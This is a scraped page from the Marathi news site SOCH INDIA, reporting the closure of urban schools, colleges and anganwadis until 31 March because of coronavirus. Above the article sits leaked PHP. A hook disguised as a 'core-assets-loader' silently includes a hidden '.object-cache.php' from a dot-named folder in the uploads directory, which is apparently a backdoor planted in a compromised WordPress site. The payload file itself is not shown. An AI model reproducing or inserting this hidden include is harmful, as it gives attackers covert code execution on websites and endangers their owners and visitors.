add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Coronavirus राज्यातील सर्व शाळा आणि कॉलेजेस सुट्टी जाहीर, सरकारचा मोठा निर्णय – SOCH INDIA
Menu

देश
Coronavirus राज्यातील सर्व शाळा आणि कॉलेजेस सुट्टी जाहीर, सरकारचा मोठा निर्णय

nobanner

करोनाच्या पार्श्वभूमीवर राज्य सरकारने मोठा निर्णय घेतला आहे. खबरदारीचा उपाय म्हणून राज्यातील सर्व शाळांना ३१ मार्च पर्यंत सुट्टी जाहीर करण्यात आली आहे. महापालिका, नगरपालिका, नगरपंचायत हद्दीतील शाळा बंद राहणार असल्याचा निर्णय राज्य सरकारने जाहीर केला आहे. ग्रामीण भागांमधील शाळा बंद होणार नाहीत. अंगणवाड्याही बंद राहणार असल्याचं सरकारने म्हटलं आहे. सांस्कृतिक कार्यक्रमांना पोलिसांनी परवानगी देऊ नये असंही राज्य सरकारने म्हटलं आहे.

करोना विषाणूचा प्रादुर्भाव रोखण्यासाठी राज्यात साथ रोग प्रतिबंधात्मक कायदा लागू करण्यात आला आहे. करोना रोखण्यासाठी आणि गर्दी टाळण्यासाठी राज्य सरकारने महापालिका, नगरपालिका आणि नगरपंचायत क्षेत्रातील सर्व सरकारी आणि खासगी शाळा, महाविद्यालयं यांना सुट्टी जाहीर केली आहे. दहावी आणि बारवीच्या परीक्षांसोबत विद्यापीठांमधील परीक्षा या वेळापत्रकाप्रमाणेच होतील असंही पत्रकात स्पष्ट करण्यात आलं आहे.

राज्यातील मुंबई, ठाणे, पुणे, पिंपरी आणि नागपूर या शहरांमधील जिम, स्विमिंग पूल, चित्रपटगृहं बंद ठेवण्याचा निर्णय याआधीच राज्य सरकारने जाहीर केला आहे. आता करोनाचा प्रादुर्भाव वाढू नये म्हणून राज्य सरकारने शाळा आणि महाविद्यालयांनाही सुट्टी जाहीर केली आहे.